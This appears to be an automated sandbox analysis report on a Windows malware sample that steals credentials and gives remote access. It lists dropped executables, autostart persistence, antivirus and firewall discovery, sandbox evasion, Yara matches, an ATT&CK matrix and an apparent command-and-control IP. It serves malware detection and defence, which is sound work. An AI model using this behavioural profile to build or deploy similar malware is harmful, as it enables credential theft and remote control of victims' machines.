                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeQueries volume information: C:\Users\user\Desktop\m4n1AQRhaP.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeQueries volume information: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeQueries volume information: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe VolumeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeQueries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeQueries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
                            Source: C:\Recovery\upfc.exeQueries volume information: C:\Recovery\upfc.exe VolumeInformation
                            Source: C:\Recovery\upfc.exeQueries volume information: C:\Recovery\upfc.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeQueries volume information: C:\Windows\bcastdvr\uwTuxQS3V.exe VolumeInformation
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeQueries volume information: C:\Windows\bcastdvr\uwTuxQS3V.exe VolumeInformation
                            Source: C:\Windows\IME\en-GB\Registry.exeQueries volume information: C:\Windows\IME\en-GB\Registry.exe VolumeInformation
                            Source: C:\Windows\IME\en-GB\Registry.exeQueries volume information: C:\Windows\IME\en-GB\Registry.exe VolumeInformation
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeQueries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
                            Source: C:\Recovery\upfc.exeQueries volume information: C:\Recovery\upfc.exe VolumeInformation
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1615729735.00000000012B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: m4n1AQRhaP.exe PID: 6756, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408, type: MEMORYSTR
                            Source: Yara matchFile source: m4n1AQRhaP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: m4n1AQRhaP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: m4n1AQRhaP.exe PID: 6756, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408, type: MEMORYSTR
                            Source: Yara matchFile source: m4n1AQRhaP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: m4n1AQRhaP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\upfc.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts241
                            Windows Management Instrumentation
                            1
                            Scheduled Task/Job
                            11
                            Process Injection
                            131
                            Masquerading
                            OS Credential Dumping241
                            Security Software Discovery
                            1
                            Taint Shared Content
                            11
                            Archive Collected Data
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job
                            1
                            Scripting
                            1
                            Scheduled Task/Job
                            1
                            Disable or Modify Tools
                            LSASS Memory1
                            Process Discovery
                            Remote Desktop ProtocolData from Removable Media1
                            Non-Application Layer Protocol
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt31
                            Registry Run Keys / Startup Folder
                            31
                            Registry Run Keys / Startup Folder
                            151
                            Virtualization/Sandbox Evasion
                            Security Account Manager151
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive11
                            Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            11
                            Process Injection
                            NTDS1
                            Remote System Discovery
                            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information
                            LSA Secrets1
                            System Network Configuration Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                            Obfuscated Files or Information
                            Cached Domain Credentials2
                            File and Directory Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                            Software Packing
                            DCSync34
                            System Information Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            File Deletion
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1639526 Sample: m4n1AQRhaP.exe Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Antivirus detection for URL or domain 2->64 66 14 other signatures 2->66 7 m4n1AQRhaP.exe 13 33 2->7         started        11 iHstGpVMr4QFhc62UUbis.exe 14 11 2->11         started        14 iHstGpVMr4QFhc62UUbis.exe 3 2->14         started        16 9 other processes 2->16 process3 dnsIp4 42 C:\Windows\bcastdvr\uwTuxQS3V.exe, PE32 7->42 dropped 44 C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, PE32 7->44 dropped 46 C:\Windows\IME\en-GB\Registry.exe, PE32 7->46 dropped 54 15 other malicious files 7->54 dropped 76 Creates an undocumented autostart registry key 7->76 78 Creates multiple autostart registry keys 7->78 80 Creates an autostart registry key pointing to binary in C:\Windows 7->80 88 2 other signatures 7->88 18 cmd.exe 7->18         started        21 csc.exe 4 7->21         started        24 schtasks.exe 7->24         started        26 14 other processes 7->26 58 83.217.209.253, 49697, 49700, 49703 INF-NET-ASRU Russian Federation 11->58 48 C:\Users\user\Desktop\rCwnUSpv.log, PE32 11->48 dropped 50 C:\Users\user\Desktop\qLTnEFIs.log, PE32 11->50 dropped 52 C:\Users\user\Desktop\kSqObZEE.log, PE32 11->52 dropped 56 4 other malicious files 11->56 dropped 82 Antivirus detection for dropped file 14->82 84 Multi AV Scanner detection for dropped file 14->84 86 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->86 file5 signatures6 process7 file8 68 Uses ping.exe to sleep 18->68 70 Drops executables to the windows directory (C:\Windows) and starts them 18->70 72 Uses ping.exe to check the status of other devices and networks 18->72 28 conhost.exe 18->28         started        30 chcp.com 18->30         started        32 PING.EXE 18->32         started        34 ikEtBZXIKU1m0Gn.exe 18->34         started        40 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->40 dropped 74 Infects executable files (exe, dll, sys, html) 21->74 36 conhost.exe 21->36         started        38 cvtres.exe 1 21->38         started        signatures9 process10

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.